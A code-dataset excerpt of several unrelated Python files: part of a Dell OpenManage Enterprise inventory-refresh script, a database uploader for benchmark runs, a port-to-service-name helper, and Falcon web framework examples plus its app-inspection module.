+ " with error: " + response.text)
return data
def track_job_to_completion(ome_ip_address: str,
authenticated_headers: dict,
tracked_job_id,
max_retries: int = 20,
sleep_interval: int = 30) -> bool:
"""
Tracks a job to either completion or a failure within the job.
Args:
ome_ip_address: The IP address of the OME server
authenticated_headers: A dictionary of HTTP headers generated from an authenticated session with OME
tracked_job_id: The ID of the job which you would like to track
max_retries: The maximum number of times the function should contact the server to see if the job has completed
sleep_interval: The frequency with which the function should check the server for job completion
Returns: True if the job completed successfully or completed with errors. Returns false if the job failed.
"""
job_status_map = {
"2020": "Scheduled",
"2030": "Queued",
"2040": "Starting",
"2050": "Running",
"2060": "Completed",
"2070": "Failed",
"2090": "Warning",
"2080": "New",
"2100": "Aborted",
"2101": "Paused",
"2102": "Stopped",
"2103": "Canceled"
}
failed_job_status = [2070, 2090, 2100, 2101, 2102, 2103]
job_url = 'https://%s/api/JobService/Jobs(%s)' % (ome_ip_address, tracked_job_id)
loop_ctr = 0
job_incomplete = True
print("Polling %s to completion ..." % tracked_job_id)
while loop_ctr < max_retries:
loop_ctr += 1
time.sleep(sleep_interval)
job_resp = requests.get(job_url, headers=authenticated_headers, verify=False)
if job_resp.status_code == 200:
job_status = str((job_resp.json())['LastRunStatus']['Id'])
job_status_str = job_status_map[job_status]
print("Iteration %s: Status of %s is %s" % (loop_ctr, tracked_job_id, job_status_str))
if int(job_status) == 2060:
job_incomplete = False
print("Job completed successfully!")
break
elif int(job_status) in failed_job_status:
job_incomplete = True
if job_status_str == "Warning":
print("Completed with errors")
else:
print("Error: Job failed.")
job_hist_url = str(job_url) + "/ExecutionHistories"
job_hist_resp = requests.get(job_hist_url, headers=authenticated_headers, verify=False)
if job_hist_resp.status_code == 200:
# Get the job's execution details
job_history_id = str((job_hist_resp.json())['value'][0]['Id'])
execution_hist_detail = "(" + job_history_id + ")/ExecutionHistoryDetails"
job_hist_det_url = str(job_hist_url) + execution_hist_detail
job_hist_det_resp = requests.get(job_hist_det_url,
headers=authenticated_headers,
verify=False)
if job_hist_det_resp.status_code == 200:
pprint(job_hist_det_resp.json()['value'])
else:
print("Unable to parse job execution history... exiting")
break
else:
print("Unable to poll status of %s - Iteration %s " % (tracked_job_id, loop_ctr))
if job_incomplete:
print("Job %s incomplete after polling %s times...Check status" % (tracked_job_id, max_retries))
return False
return True
def get_device_id(authenticated_headers: dict,
ome_ip_address: str,
service_tag: str = None,
device_idrac_ip: str = None,
device_name: str = None) -> int:
"""
Resolves a service tag, idrac IP or device name to a device ID
Args:
authenticated_headers: A dictionary of HTTP headers generated from an authenticated session with OME
ome_ip_address: IP address of the OME server
service_tag: (optional) The service tag of a host
device_idrac_ip: (optional) The idrac IP of a host
device_name: (optional): The name of a host
Returns: Returns the device ID or -1 if it couldn't be found
"""
if not service_tag and not device_idrac_ip and not device_name:
print("No argument provided to get_device_id. Must provide service tag, device idrac IP or device name.")
return -1
# If the user passed a device name, resolve that name to a device ID
if device_name:
device_id = get_data(authenticated_headers, "https://%s/api/DeviceService/Devices" % ome_ip_address,
"DeviceName eq \'%s\'" % device_name)
if len(device_id) == 0:
print("Error: We were unable to find device name " + device_name + " on this OME server. Exiting.")
return -1
device_id = device_id[0]['Id']
elif service_tag:
device_id = get_data(authenticated_headers, "https://%s/api/DeviceService/Devices" % ome_ip_address,
"DeviceServiceTag eq \'%s\'" % service_tag)
if len(device_id) == 0:
print("Error: We were unable to find service tag " + service_tag + " on this OME server. Exiting.")
return -1
device_id = device_id[0]['Id']
elif device_idrac_ip:
device_id = -1
device_ids = get_data(authenticated_headers, "https://%s/api/DeviceService/Devices" % ome_ip_address,
"DeviceManagement/any(d:d/NetworkAddress eq '%s')" % device_idrac_ip)
if len(device_ids) == 0:
print("Error: We were unable to find idrac IP " + device_idrac_ip + " on this OME server. Exiting.")
return -1
        # TODO - This is necessary because the filter above could possibly return multiple results
# TODO - See https://github.com/dell/OpenManage-Enterprise/issues/87
for device_id in device_ids:
if device_id['DeviceManagement'][0]['NetworkAddress'] == device_idrac_ip:
device_id = device_id['Id']
if device_id == -1:
print("Error: We were unable to find idrac IP " + device_idrac_ip + " on this OME server. Exiting.")
return -1
else:
device_id = -1
return device_id
def refresh_device_inventory(authenticated_headers: dict,
ome_ip_address: str,
group_name: str,
skip_config_inventory: bool,
device_ids: list = None,
service_tags: str = None,
device_idrac_ips: str = None,
device_names: str = None,
ignore_group: bool = False):
"""
Refresh the inventory of targeted hosts
Args:
authenticated_headers: A dictionary of HTTP headers generated from an authenticated session with OME
ome_ip_address: IP address of the OME server
group_name: The name of the group which contains the servers whose inventories you want to refresh
skip_config_inventory: A boolean defining whether you would like to skip gathering the config inventory
device_ids: (optional) The device ID of a host whose inventory you want to refresh
service_tags: (optional) The service tag of a host whose inventory you want to refresh
device_idrac_ips: (optional) The idrac IP of a host whose inventory you want to refresh
device_names: (optional): The name of a host whose inventory you want to refresh
ignore_group: (optional): Controls whether you want to ignore using groups or not
"""
jobs_url = "https://%s/api/JobService/Jobs" % ome_ip_address
target_ids = []
    if service_tags:
        # Accept either a comma-separated string or an already-split list (as passed from __main__).
        if isinstance(service_tags, str):
            service_tags = service_tags.split(',')
for service_tag in service_tags:
target = get_device_id(headers, ome_ip_address, service_tag=service_tag)
if target != -1:
target_ids.append(target)
else:
print("Could not resolve ID for: " + service_tag)
    if device_idrac_ips:
        if isinstance(device_idrac_ips, str):
            device_idrac_ips = device_idrac_ips.split(',')
for device_idrac_ip in device_idrac_ips:
target = get_device_id(headers, ome_ip_address, device_idrac_ip=device_idrac_ip)
if target != -1:
target_ids.append(target)
else:
print("Could not resolve ID for: " + device_idrac_ip)
    if device_names:
        if isinstance(device_names, str):
            device_names = device_names.split(',')
for device_name in device_names:
target = get_device_id(headers, ome_ip_address, device_name=device_name)
if target != -1:
target_ids.append(target)
else:
print("Could not resolve ID for: " + device_name)
if device_ids:
for device_id in device_ids:
target_ids.append(device_id)
if not skip_config_inventory:
group_id = get_group_id_by_name(ome_ip_address, group_name, authenticated_headers)
if group_id == -1:
print("We were unable to find the ID for group name " + group_name + " ... exiting.")
sys.exit(0)
if not ignore_group:
group_devices = get_data(headers, "https://%s/api/GroupService/Groups(%s)/Devices" % (ome_ip_address, group_id))
if len(group_devices) < 1:
print("Error: There was a problem retrieving the devices for group " + args.groupname + ". Exiting")
sys.exit(0)
for device in group_devices:
target_ids.append(device['Id'])
targets_payload = []
for id_to_refresh in target_ids:
targets_payload.append({
"Id": id_to_refresh,
"Data": "",
"TargetType": {
"Id": 1000,
"Name": "DEVICE"
}
})
payload = {
"Id": 0,
"JobName": "Inventory refresh via the API.",
"JobDescription": "Refreshes the inventories for targeted hardware.",
"Schedule": "startnow",
"State": "Enabled",
"JobType": {
"Name": "Inventory_Task"
},
"Targets": targets_payload
}
print("Beginning standard inventory refresh...")
create_resp = requests.post(jobs_url, headers=authenticated_headers, verify=False, data=json.dumps(payload))
if create_resp.status_code == 201:
job_id_generic_refresh = json.loads(create_resp.content)["Id"]
else:
print("Error: Failed to refresh inventory. We aren't sure what went wrong.")
sys.exit(1)
if job_id_generic_refresh is None:
print("Received invalid job ID from OME for standard inventory. Exiting.")
sys.exit(1)
# ------------------------------------------------------
if not skip_config_inventory:
payload = {
"JobDescription": "Run config inventory collection task on selected devices",
"JobName": "Part 1 - API refresh config inventory",
"JobType": {"Id": 50, "Name": "Device_Config_Task"},
"Params": [{"Key": "action", "Value": "CONFIG_INVENTORY"}],
"Schedule": "startnow",
"StartTime": "",
"State": "Enabled",
"Targets": [{
"Data": "",
"Id": group_id,
"JobId": -1,
"TargetType": {"Id": 6000, "Name": "GROUP"}
}]
}
print("Beginning part 1 of 2 of the configuration inventory refresh.")
create_resp = requests.post(jobs_url, headers=authenticated_headers, verify=False, data=json.dumps(payload))
if create_resp.status_code == 201:
config_inventory_refresh_job_1 = json.loads(create_resp.content)["Id"]
else:
print("Error: Failed to refresh inventory. We aren't sure what went wrong.")
sys.exit(1)
if config_inventory_refresh_job_1 is None:
print("Received invalid job ID from OME for part 1 of configuration inventory refresh... exiting.")
sys.exit(1)
print("Waiting for part 1 of configuration inventory refresh to finish. This could take a couple of minutes.")
if track_job_to_completion(ome_ip_address, authenticated_headers, config_inventory_refresh_job_1):
print("Part 1 of configuration inventory refresh completed successfully.")
else:
print("Something went wrong. See text output above for more details.")
# ------------------------------------------------------
payload = {
"JobDescription": "Create Inventory",
"JobName": "Part 2 - API refresh config inventory",
"JobType": {"Id": 8, "Name": "Inventory_Task"},
"Params": [
{"Key": "action", "Value": "CONFIG_INVENTORY"},
{"Key": "isCollectDriverInventory", "Value": "true"}],
"Schedule": "startnow",
"StartTime": "",
"State": "Enabled",
"Targets": [{
"Data": "",
"Id": group_id,
"JobId": -1,
"TargetType": {"Id": 6000, "Name": "GROUP"}
}]
}
print("Beginning part 2 of 2 of the configuration inventory refresh")
create_resp = requests.post(jobs_url, headers=authenticated_headers, verify=False, data=json.dumps(payload))
if create_resp.status_code == 201:
config_inventory_refresh_job_2 = json.loads(create_resp.content)["Id"]
else:
print("Error: Failed to refresh inventory. We aren't sure what went wrong.")
sys.exit(1)
if config_inventory_refresh_job_2 is None:
print("Received invalid job ID from OME for part 2 of the configuration inventory refresh... exiting.")
sys.exit(1)
print("Waiting for part 2 of the configuration inventory refresh to finish. "
"This could take a couple of minutes.")
if track_job_to_completion(ome_ip_address, authenticated_headers, config_inventory_refresh_job_2):
print("Inventory refresh completed successfully.")
else:
print("Something went wrong. See text output above for more details.")
print("Tracking standard inventory to completion.")
if track_job_to_completion(ome_ip_address, authenticated_headers, job_id_generic_refresh):
print("Inventory refresh completed successfully.")
else:
print("Something went wrong. See text output above for more details.")
print("Inventory refresh complete!")
if __name__ == '__main__':
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
parser = argparse.ArgumentParser(description=__doc__, formatter_class=RawTextHelpFormatter)
parser.add_argument("--ip", "-i", required=True, help="OME Appliance IP")
parser.add_argument("--user", "-u", required=False,
help="Username for the OME Appliance", default="admin")
parser.add_argument("--password", "-p", required=True,
help="Password for the OME Appliance")
parser.add_argument("--groupname", "-g", required=False, default="All Devices",
help="The name of the group containing the devices whose inventory you want to refresh. "
"Defaults to all devices. Due to the way the API functions, if you want to refresh the "
"configuration inventory, you must have all applicable devices in a group. The "
"configuration inventory is specific to the tab called \"Configuration Inventory\" under "
"a device's view. You can use the create_static_group and add_device_to_static group "
"modules to do this programmatically.")
parser.add_argument("--device-ids", "-d", help="A comma separated list of device-ids to refresh. Applies to "
"regular inventory only. This does not impact the configuration "
"inventory tab. That is controlled by the group name.")
parser.add_argument("--service-tags", "-s", help="A comma separated list of service tags to refresh. Applies to "
"regular inventory only. This does not impact the configuration "
"inventory tab. That is controlled by the group name.")
parser.add_argument("--idrac-ips", "-r", help="A comma separated list of idrac IPs to refresh. Applies to regular "
"inventory only. This does not impact the configuration inventory "
"tab. That is controlled by the group name.")
parser.add_argument("--device-names", "-n", help="A comma separated list of device names to refresh. Applies to "
"regular inventory only. This does not impact the configuration "
"inventory tab. That is controlled by the group name.")
parser.add_argument("--skip-config-inventory", "-skip", default=False, action='store_true',
help="The configuration inventory is the inventory you see specifically under the tab for a"
" specific device. In order to obtain a config inventory that server must be part of a"
" group or you have to run an inventory update against all devices which can be time "
"consuming. A regular inventory run will update things like firmware assuming that the"
" version change is reflected in idrac. A config inventory is launched in the GUI by "
"clicking \"Run inventory\" on quick links on the devices page. A regular inventory is "
"the same as clicking \"Run inventory\" on a specific device\'s page.")
parser.add_argument("--ignore-group", default=False, action='store_true', help="Used when you only want to run a"
" regular inventory and you do not want to provide a group.")
args = parser.parse_args()
try:
headers = authenticate(args.ip, args.user, args.password)
if not headers:
sys.exit(0)
if args.device_ids:
device_ids_arg = args.device_ids.split(',')
else:
device_ids_arg = None
if args.service_tags:
service_tags_arg = args.service_tags.split(',')
else:
service_tags_arg = None
if args.idrac_ips:
idrac_ips_arg = args.idrac_ips.split(',')
else:
idrac_ips_arg = None
if args.device_names:
device_names_arg = args.device_names.split(',')
else:
device_names_arg = None
print("WARNING: To reflect firmware changes you may have to power cycle the server first before running this. "
"It is situation dependent.")
if args.groupname == 'All Devices':
print("WARNING: No argument was provided for groupname. Defaulting to \'All Devices\' for the "
"inventory refresh. See help for details. This will also display if the argument was manually set "
"to \'All Devices\' and can be safely ignored. If you do not want to use a group AND you do not want"
" to update the configuration inventory tab, use the --skip-config-inventory and --ignore-group"
" switches together. If you want to use a group to update regular inventories only and not the"
" configuration inventory tab use the --skip-config-inventory switch by itself.")
refresh_device_inventory(headers, args.ip, args.groupname, args.skip_config_inventory, device_ids_arg,
service_tags_arg, idrac_ips_arg, device_names_arg, args.ignore_group)
except Exception as error:
print("Unexpected error:", str(error))
``` |
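The helper functions above (`authenticate`, `get_data`, `get_device_id`) are reusable outside this script. Below is a minimal, hypothetical sketch of listing every device known to an appliance via the paginated `get_data` helper; the IP address and credentials are placeholders, not values from the original repository.
```python
# Hypothetical usage sketch; assumes the functions above are importable from this module.
headers = authenticate('192.168.1.120', 'admin', 'example-password')
devices = get_data(headers, 'https://192.168.1.120/api/DeviceService/Devices')
for device in devices:
    print(device['Id'], device.get('DeviceServiceTag'))
```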
{
"source": "5nizza/bene",
"score": 2
} |
#### File: 5nizza/bene/data_uploader.py
```python
import logging
from typing import Iterable
from adhoc_fields import adhoc_fields
from field_desc import FieldDesc
from structs import ExpDesc, TimedRunParams, ToolRunParams, RunResult
from peewee import *
from config import DB_HOST, DB_USER, DB_PASSWD, DB_DBNAME
from utils import readfile
# taken from:
# http://peewee.readthedocs.org/en/latest/peewee/example.html#example-app
database = MySQLDatabase(host=DB_HOST,
user=DB_USER,
                         passwd=DB_PASSWD,
database=DB_DBNAME)
# database = SqliteDatabase('tests.db')
class BaseModel(Model): # BaseModel is only used to specify the database
class Meta:
database = database
class RunRecord(BaseModel):
""" Note: see the end of this module -- this class is updated with fields from adhoc_fields """
total_time_sec = FloatField(null=True)
circuit_size = IntegerField(null=True)
memory_mb = FloatField(null=True)
is_realizable = CharField()
model = TextField(null=True)
input_file = CharField()
logs = TextField(null=True)
tool_params = CharField()
exp = CharField()
commit = CharField(null=True)
hardware = CharField(null=True)
datetime = DateTimeField(null=True)
note = CharField(null=True)
time_limit_sec = FloatField(null=True)
memory_limit_mb = FloatField(null=True)
def __init__(self,
exp_desc:ExpDesc,
timed_run_params:TimedRunParams, tool_run_params:ToolRunParams,
run_result:RunResult,
*args, **kwargs):
super().__init__(*args, **kwargs)
self.total_time_sec = run_result.total_time_sec
self.circuit_size = run_result.circuit_size
self.memory_mb = run_result.memory_mb
self.is_realizable = run_result.is_realizable
self.model = run_result.model
self.input_file = tool_run_params.input_file
self.logs = readfile(tool_run_params.log_file) if tool_run_params.log_file else ''
self.tool_params = tool_run_params.params
self.exp = exp_desc.exp_name
self.commit = exp_desc.commit
self.hardware = exp_desc.hardware
self.datetime = exp_desc.datetime
self.note = exp_desc.note
self.time_limit_sec = timed_run_params.time_limit_sec
self.memory_limit_mb = timed_run_params.memory_limit_mb
def __add_static_fields_RunRecord(adhoc_fields_:Iterable[FieldDesc]):
for f_desc in adhoc_fields_:
f_desc.db_field.add_to_class(RunRecord, f_desc.name)
def __add_object_fields_RunRecord(rr:RunRecord, adhoc_data:dict):
""" :arg adhoc_data: dict{field_name -> field python value}"""
for name, value in adhoc_data.items():
setattr(rr, name, value)
def upload_run(exp_desc:ExpDesc,
timed_run_params:TimedRunParams,
tool_run_params:ToolRunParams,
run_result:RunResult,
adhoc_data:dict):
logging.info('data_uploader.upload_record')
logging.debug('run_result=' + str(run_result))
RunRecord._meta.db_table = exp_desc.exp_name
with database.transaction():
rr = RunRecord(exp_desc, timed_run_params, tool_run_params, run_result)
__add_object_fields_RunRecord(rr, adhoc_data)
rr.save()
def create_table(table_name):
""" Fails if table 'table_name' already exists. """
logging.info('create_table: ' + table_name)
RunRecord._meta.db_table = table_name # TODO: not clear: should you restore the old name?
database.connect()
database.create_table(RunRecord)
database.close()
def table_exists(table_name):
old_name = RunRecord._meta.db_table
RunRecord._meta.db_table = table_name
result = RunRecord.table_exists()
RunRecord._meta.db_table = old_name
return result
__add_static_fields_RunRecord(adhoc_fields)
``` |
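A short, hypothetical sketch of the table helpers above; the module import path and the experiment/table name are assumptions for illustration, and it presumes the database configured in `config` is reachable.
```python
# Hypothetical sketch: create the per-experiment table only if it does not exist yet.
import data_uploader

experiment = 'exp_2024_01'  # example experiment/table name
if not data_uploader.table_exists(experiment):
    data_uploader.create_table(experiment)
```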
{
"source": "5O00/Simple-Port-Scanner",
"score": 3
} |
#### File: Simple-Port-Scanner/Scanner_app/ServPort.py
```python
import socket
def ServerOnPort(Number_Port, Protocol):
ServiceName = socket.getservbyport(Number_Port, Protocol)
print("[+] port number %d : %s"%(Number_Port, ServiceName))
``` |
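For reference, a minimal usage sketch of the helper above; the import path is inferred from the file layout shown and may differ in practice.
```python
# Hypothetical usage: print the well-known service names registered for a few common ports.
from Scanner_app.ServPort import ServerOnPort

for port in (22, 80, 443):
    ServerOnPort(port, "tcp")  # e.g. "[+] port number 22 : ssh"
```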
{
"source": "5onic/falcon",
"score": 2
} |
#### File: look/look/images.py
```python
import io
import mimetypes
import os
import uuid
import falcon
import msgpack
class Resource:
def __init__(self, image_store):
self._image_store = image_store
def on_get(self, req, resp):
doc = {
'images': [
{
'href': '/images/1eaf6ef1-7f2d-4ecc-a8d5-6e8adba7cc0e.png'
}
]
}
resp.data = msgpack.packb(doc, use_bin_type=True)
resp.content_type = 'application/msgpack'
resp.status = falcon.HTTP_200
def on_post(self, req, resp):
name = self._image_store.save(req.stream, req.content_type)
resp.status = falcon.HTTP_201
resp.location = '/images/' + name
class ImageStore:
_CHUNK_SIZE_BYTES = 4096
# Note the use of dependency injection for standard library
# methods. We'll use these later to avoid monkey-patching.
def __init__(self, storage_path, uuidgen=uuid.uuid4, fopen=io.open):
self._storage_path = storage_path
self._uuidgen = uuidgen
self._fopen = fopen
def save(self, image_stream, image_content_type):
ext = mimetypes.guess_extension(image_content_type)
name = '{uuid}{ext}'.format(uuid=self._uuidgen(), ext=ext)
image_path = os.path.join(self._storage_path, name)
with self._fopen(image_path, 'wb') as image_file:
while True:
chunk = image_stream.read(self._CHUNK_SIZE_BYTES)
if not chunk:
break
image_file.write(chunk)
return name
```
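The constructor comment above notes that `uuidgen` and `fopen` are injected so tests can swap them out without monkey-patching. A minimal sketch of such a unit test follows; the module path, the fixed UUID, and the POSIX-style storage path are illustrative assumptions.
```python
# Hypothetical unit test: exercise ImageStore.save without touching the filesystem.
import io
from unittest import mock

from look.images import ImageStore  # assumed module path

def test_save_uses_injected_uuid_and_fopen():
    fake_open = mock.mock_open()
    store = ImageStore('/tmp', uuidgen=lambda: 'deadbeef', fopen=fake_open)

    name = store.save(io.BytesIO(b'fake-image-bytes'), 'image/png')

    assert name == 'deadbeef.png'
    fake_open.assert_called_once_with('/tmp/deadbeef.png', 'wb')
    fake_open().write.assert_called_once_with(b'fake-image-bytes')
```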
#### File: look/tests/conftest.py
```python
import os
import subprocess
import time
import requests
LOOK_PATH = os.path.abspath(os.path.join(os.path.dirname(__file__), '..'))
gunicorn = None
def pytest_sessionstart(session):
global gunicorn
gunicorn = subprocess.Popen(
('gunicorn', '--pythonpath', LOOK_PATH, 'look.app:get_app()'),
env=dict(os.environ, LOOK_STORAGE_PATH='/tmp'),
)
# NOTE(vytas): give Gunicorn some time to start.
for attempt in range(3):
try:
            requests.get('http://127.0.0.1:8000/images', timeout=1)  # Gunicorn's default bind address
break
except requests.exceptions.RequestException:
pass
time.sleep(0.2)
def pytest_sessionfinish(session, exitstatus):
gunicorn.terminate()
gunicorn.communicate()
```
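With the session fixture above, functional tests can talk to the Gunicorn process over plain HTTP. A minimal sketch follows; it assumes Gunicorn's default bind of 127.0.0.1:8000 and that the app routes `Resource` from look/images.py at `/images`.
```python
# Hypothetical functional test relying on the Gunicorn process started in conftest.py.
import msgpack
import requests

def test_list_images_returns_msgpack_document():
    resp = requests.get('http://127.0.0.1:8000/images', timeout=2)
    assert resp.status_code == 200
    doc = msgpack.unpackb(resp.content, raw=False)
    assert 'images' in doc
```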
#### File: falcon/falcon/inspect.py
```python
from functools import partial
import inspect
from typing import Callable, Dict, List, Optional, Type
from falcon import App, app_helpers
from falcon.routing import CompiledRouter
def inspect_app(app: App) -> 'AppInfo':
"""Inspects an application.
Args:
app (falcon.App): The application to inspect. Works with both
:class:`falcon.App` and :class:`falcon.asgi.App`.
Returns:
AppInfo: The information regarding the application. Call
:meth:`~.AppInfo.to_string` on the result to obtain a human-friendly
representation.
"""
routes = inspect_routes(app)
static = inspect_static_routes(app)
sinks = inspect_sinks(app)
error_handlers = inspect_error_handlers(app)
middleware = inspect_middlewares(app)
return AppInfo(routes, middleware, static, sinks, error_handlers, app._ASGI)
def inspect_routes(app: App) -> 'List[RouteInfo]':
"""Inspects the routes of an application.
Args:
app (falcon.App): The application to inspect. Works with both
:class:`falcon.App` and :class:`falcon.asgi.App`.
Returns:
List[RouteInfo]: A list of route descriptions for the application.
"""
router = app._router
inspect_function = _supported_routers.get(type(router))
if inspect_function is None:
raise TypeError(
'Unsupported router class {}. Use "register_router" '
'to register a function that can inspect the router '
'used by the provided application'.format(type(router))
)
return inspect_function(router)
def register_router(router_class):
"""Register a function to inspect a particular router.
This decorator registers a new function for a custom router
class, so that it can be inspected with the function
:func:`.inspect_routes`.
An inspection function takes the router instance used by the
application and returns a list of :class:`.RouteInfo`. Eg::
@register_router(MyRouterClass)
def inspect_my_router(router):
return [RouteInfo('foo', 'bar', '/path/to/foo.py:42', [])]
Args:
router_class (Type): The router class to register. If
already registered an error will be raised.
"""
def wraps(fn):
if router_class in _supported_routers:
raise ValueError(
'Another function is already registered'
' for the router {}'.format(router_class)
)
_supported_routers[router_class] = fn
return fn
return wraps
# router inspection registry
_supported_routers = {} # type: Dict[Type, Callable]
def inspect_static_routes(app: App) -> 'List[StaticRouteInfo]':
"""Inspects the static routes of an application.
Args:
app (falcon.App): The application to inspect. Works with both
:class:`falcon.App` and :class:`falcon.asgi.App`.
Returns:
List[StaticRouteInfo]: A list of static routes that have
been added to the application.
"""
routes = []
for sr in app._static_routes:
info = StaticRouteInfo(sr._prefix, sr._directory, sr._fallback_filename)
routes.append(info)
return routes
def inspect_sinks(app: App) -> 'List[SinkInfo]':
"""Inspects the sinks of an application.
Args:
app (falcon.App): The application to inspect. Works with both
:class:`falcon.App` and :class:`falcon.asgi.App`.
Returns:
List[SinkInfo]: A list of sinks used by the application.
"""
sinks = []
for prefix, sink in app._sinks:
source_info, name = _get_source_info_and_name(sink)
info = SinkInfo(prefix.pattern, name, source_info)
sinks.append(info)
return sinks
def inspect_error_handlers(app: App) -> 'List[ErrorHandlerInfo]':
"""Inspects the error handlers of an application.
Args:
app (falcon.App): The application to inspect. Works with both
:class:`falcon.App` and :class:`falcon.asgi.App`.
Returns:
List[ErrorHandlerInfo]: A list of error handlers used by the
application.
"""
errors = []
for exc, fn in app._error_handlers.items():
source_info, name = _get_source_info_and_name(fn)
info = ErrorHandlerInfo(exc.__name__, name, source_info, _is_internal(fn))
errors.append(info)
return errors
def inspect_middlewares(app: App) -> 'MiddlewareInfo':
"""Inspects the middleware components of an application.
Args:
app (falcon.App): The application to inspect. Works with both
:class:`falcon.App` and :class:`falcon.asgi.App`.
Returns:
MiddlewareInfo: Information about the app's middleware components.
"""
types_ = app_helpers.prepare_middleware(app._unprepared_middleware, True, app._ASGI)
type_infos = []
for stack in types_:
current = []
for method in stack:
_, name = _get_source_info_and_name(method)
cls = type(method.__self__)
_, cls_name = _get_source_info_and_name(cls)
current.append(MiddlewareTreeItemInfo(name, cls_name))
type_infos.append(current)
middlewareTree = MiddlewareTreeInfo(*type_infos)
middlewareClasses = []
names = 'Process request', 'Process resource', 'Process response'
for m in app._unprepared_middleware:
fns = app_helpers.prepare_middleware([m], True, app._ASGI)
class_source_info, cls_name = _get_source_info_and_name(type(m))
methods = []
for method, name in zip(fns, names):
if method:
real_func = method[0]
source_info = _get_source_info(real_func)
methods.append(MiddlewareMethodInfo(real_func.__name__, source_info))
m_info = MiddlewareClassInfo(cls_name, class_source_info, methods)
middlewareClasses.append(m_info)
return MiddlewareInfo(
middlewareTree, middlewareClasses, app._independent_middleware
)
@register_router(CompiledRouter)
def inspect_compiled_router(router: CompiledRouter) -> 'List[RouteInfo]':
"""Walk an instance of :class:`~.CompiledRouter` to return a list of defined routes.
Default route inspector for CompiledRouter.
Args:
router (CompiledRouter): The router to inspect.
Returns:
List[RouteInfo]: A list of :class:`~.RouteInfo`.
"""
def _traverse(roots, parent):
for root in roots:
path = parent + '/' + root.raw_segment
if root.resource is not None:
methods = []
if root.method_map:
for method, func in root.method_map.items():
if isinstance(func, partial):
real_func = func.func
else:
real_func = func
source_info = _get_source_info(real_func)
internal = _is_internal(real_func)
method_info = RouteMethodInfo(
method, source_info, real_func.__name__, internal
)
methods.append(method_info)
source_info, class_name = _get_source_info_and_name(root.resource)
route_info = RouteInfo(path, class_name, source_info, methods)
routes.append(route_info)
if root.children:
_traverse(root.children, path)
routes = [] # type: List[RouteInfo]
_traverse(router._roots, '')
return routes
# ------------------------------------------------------------------------
# Inspection classes
# ------------------------------------------------------------------------
class _Traversable:
__visit_name__ = 'N/A'
def to_string(self, verbose=False, internal=False) -> str:
"""Return a string representation of this class.
Args:
verbose (bool, optional): Adds more information. Defaults to False.
internal (bool, optional): Also include internal route methods
and error handlers added by the framework. Defaults to
``False``.
Returns:
str: string representation of this class.
"""
return StringVisitor(verbose, internal).process(self)
def __repr__(self):
return self.to_string()
class RouteMethodInfo(_Traversable):
"""Describes a responder method.
Args:
method (str): The HTTP method of this responder.
source_info (str): The source path of this function.
function_name (str): Name of the function.
internal (bool): Whether or not this was a default responder added
by the framework.
Attributes:
suffix (str): The suffix of this route function. This is set to an empty
string when the function has no suffix.
"""
__visit_name__ = 'route_method'
def __init__(
self, method: str, source_info: str, function_name: str, internal: bool
):
self.method = method
self.source_info = source_info
self.function_name = function_name
self.internal = internal
# NOTE(CaselIT): internal falcon names do not start with on and do not have suffix
if function_name.startswith('on'):
self.suffix = '_'.join(function_name.split('_')[2:])
else:
self.suffix = ''
class RouteInfo(_Traversable):
"""Describes a route.
Args:
path (str): The path of this route.
class_name (str): The class name of the responder of this route.
source_info (str): The source path where this responder was defined.
methods (List[RouteMethodInfo]): List of methods defined in the route.
"""
__visit_name__ = 'route'
def __init__(
self,
path: str,
class_name: str,
source_info: str,
methods: List[RouteMethodInfo],
):
self.path = path
self.class_name = class_name
self.source_info = source_info
self.methods = methods
class StaticRouteInfo(_Traversable):
"""Describes a static route.
Args:
path (str): The prefix of the static route.
directory (str): The directory for the static route.
fallback_filename (str or None): Fallback filename to serve.
"""
__visit_name__ = 'static_route'
def __init__(self, prefix: str, directory: str, fallback_filename: Optional[str]):
self.prefix = prefix
self.directory = directory
self.fallback_filename = fallback_filename
class SinkInfo(_Traversable):
"""Describes a sink.
Args:
prefix (str): The prefix of the sink.
name (str): The name of the sink function or class.
source_info (str): The source path where this sink was defined.
"""
__visit_name__ = 'sink'
def __init__(self, prefix: str, name: str, source_info: str):
self.prefix = prefix
self.name = name
self.source_info = source_info
class ErrorHandlerInfo(_Traversable):
"""Desribes an error handler.
Args:
error (name): The name of the error type.
name (str): The name of the handler.
source_info (str): The source path where this error handler was defined.
internal (bool): Whether or not this is a default error handler added by
the framework.
"""
__visit_name__ = 'error_handler'
def __init__(self, error: str, name: str, source_info: str, internal: bool):
self.error = error
self.name = name
self.source_info = source_info
self.internal = internal
class MiddlewareMethodInfo(_Traversable):
"""Describes a middleware method.
Args:
function_name (str): Name of the method.
source_info (str): The source path of the method.
"""
__visit_name__ = 'middleware_method'
def __init__(self, function_name: str, source_info: str):
self.function_name = function_name
self.source_info = source_info
self.internal = False # added for compatibility with RouteMethodInfo
class MiddlewareClassInfo(_Traversable):
"""Describes a middleware class.
Args:
name (str): The name of the middleware class.
source_info (str): The source path where the middleware was defined.
methods (List[MiddlewareMethodInfo]): List of method defined by the middleware class.
"""
__visit_name__ = 'middleware_class'
def __init__(
self, name: str, source_info: str, methods: List[MiddlewareMethodInfo]
):
self.name = name
self.source_info = source_info
self.methods = methods
class MiddlewareTreeItemInfo(_Traversable):
"""Describes a middleware tree entry.
Args:
name (str): The name of the method.
class_name (str): The class name of the method.
"""
__visit_name__ = 'middleware_tree_item'
_symbols = {
'process_request': '→',
'process_resource': '↣',
'process_response': '↢',
}
def __init__(self, name: str, class_name: str):
self.name = name
self.class_name = class_name
class MiddlewareTreeInfo(_Traversable):
"""Describes the middleware methods used by the app.
Args:
request (List[MiddlewareTreeItemInfo]): The `process_request` methods.
resource (List[MiddlewareTreeItemInfo]): The `process_resource` methods.
response (List[MiddlewareTreeItemInfo]): The `process_response` methods.
"""
__visit_name__ = 'middleware_tree'
def __init__(
self,
request: List[MiddlewareTreeItemInfo],
resource: List[MiddlewareTreeItemInfo],
response: List[MiddlewareTreeItemInfo],
):
self.request = request
self.resource = resource
self.response = response
class MiddlewareInfo(_Traversable):
"""Describes the middleware of the app.
Args:
middlewareTree (MiddlewareTreeInfo): The middleware tree of the app.
middlewareClasses (List[MiddlewareClassInfo]): The middleware classes of the app.
independent (bool): Whether or not the middleware components are executed
independently.
Attributes:
independent_text (str): Text created from the `independent` arg.
"""
__visit_name__ = 'middleware'
def __init__(
self,
middleware_tree: MiddlewareTreeInfo,
middleware_classes: List[MiddlewareClassInfo],
independent: bool,
):
self.middleware_tree = middleware_tree
self.middleware_classes = middleware_classes
self.independent = independent
if independent:
self.independent_text = 'Middleware are independent'
else:
self.independent_text = 'Middleware are dependent'
